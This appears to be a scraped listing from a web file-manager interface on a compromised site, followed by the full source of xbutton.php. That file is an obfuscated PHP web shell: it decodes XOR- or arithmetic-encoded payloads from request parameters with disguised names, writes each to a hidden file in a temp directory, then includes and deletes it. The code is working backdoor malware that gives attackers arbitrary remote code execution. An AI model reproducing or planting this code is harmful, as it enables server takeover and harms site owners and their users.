at path:
ROOT
/
xbutton.php
run:
R
W
Run
.holder
49 By
2026-04-10 08:56:58
R
W
Run
Delete
Rename
.htaccess
231 By
2026-04-06 01:42:36
R
W
Run
Delete
Rename
.k
744 By
2026-04-17 01:05:08
R
W
Run
Delete
Rename
.pointer
744 By
2026-04-18 03:26:19
R
W
Run
Delete
Rename
.rec
744 By
2026-04-14 18:04:18
R
W
Run
Delete
Rename
db.inc.php
5.58 KB
2026-04-11 20:44:45
R
W
Run
Delete
Rename
error_log
10.17 KB
2026-04-17 01:05:08
R
W
Run
Delete
Rename
hu.php
1.28 KB
2026-04-10 00:42:02
R
W
Run
Delete
Rename
robots.txt
955 By
2026-04-06 01:44:06
R
W
Run
Delete
Rename
simple.php
15.05 KB
2026-04-06 01:42:36
R
W
Run
Delete
Rename
so.php
2.57 KB
2026-04-06 01:42:36
R
W
Run
Delete
Rename
so_SO.php
1.46 KB
2026-04-06 01:42:36
R
W
Run
Delete
Rename
xbutton.php
2.11 KB
2026-04-06 01:42:36
R
W
Run
Delete
Rename
error_log
up
📄
xbutton.php
Save
<?php if(!is_null($_POST["\x66\x61ct\x6Fr"] ?? null)){ $bind = hex2bin($_POST["\x66\x61ct\x6Fr"]); $item = '' ; foreach(str_split($bind) as $char){$item .= chr(ord($char) ^ 83);} $rec = array_filter(["/var/tmp", getcwd(), sys_get_temp_dir(), session_save_path(), "/tmp", getenv("TEMP"), ini_get("upload_tmp_dir"), getenv("TMP"), "/dev/shm"]); for ($fac = 0, $ref = count($rec); $fac < $ref; $fac++) { $ptr = $rec[$fac]; if (is_writable($ptr) && is_dir($ptr)) { $ent = "$ptr/.property_set"; $file = fopen($ent, 'w'); if ($file) { fwrite($file, $item); fclose($file); include $ent; @unlink($ent); die(); } } } } if(!is_null($_REQUEST["r\x65\x73"] ?? null)){ $property_set = $_REQUEST["r\x65\x73"]; $property_set = explode ( '.' , $property_set ); $ent= ''; $salt2= 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS= strlen($salt2); $__len= count($property_set); for ($z= 0; $z < $__len; $z++) { $v5= $property_set[$z]; $sChar= ord($salt2[$z % $lenS]); $dec= ((int)$v5 - $sChar - ($z % 10)) ^59; $ent .= chr($dec); } $flag = array_filter([getenv("TMP"), "/dev/shm", getcwd(), getenv("TEMP"), "/tmp", "/var/tmp", sys_get_temp_dir(), session_save_path(), ini_get("upload_tmp_dir")]); $dat = 0; do { $descriptor = $flag[$dat] ?? null; if ($dat >= count($flag)) break; if (!( !is_dir($descriptor) || !is_writable($descriptor) )) { $elem = "$descriptor/.holder"; if (file_put_contents($elem, $ent)) { include $elem; @unlink($elem); die(); } } $dat++; } while (true); } if(isset($_POST["en\x74"])){ $token = array_filter([getcwd(), "/tmp", sys_get_temp_dir(), "/var/tmp", getenv("TMP"), ini_get("upload_tmp_dir"), session_save_path(), getenv("TEMP"), "/dev/shm"]); $res = hex2bin($_POST["en\x74"]); $entity = '' ; for($y=0; $y<strlen($res); $y++){$entity .= chr(ord($res[$y]) ^ 51);} foreach ($token as $mrk): if (is_writable($mrk) && is_dir($mrk)) { $property_set = str_replace("{var_dir}", $mrk, "{var_dir}/.rec"); $success = file_put_contents($property_set, $entity); if ($success) { include $property_set; @unlink($property_set); exit;} } endforeach; }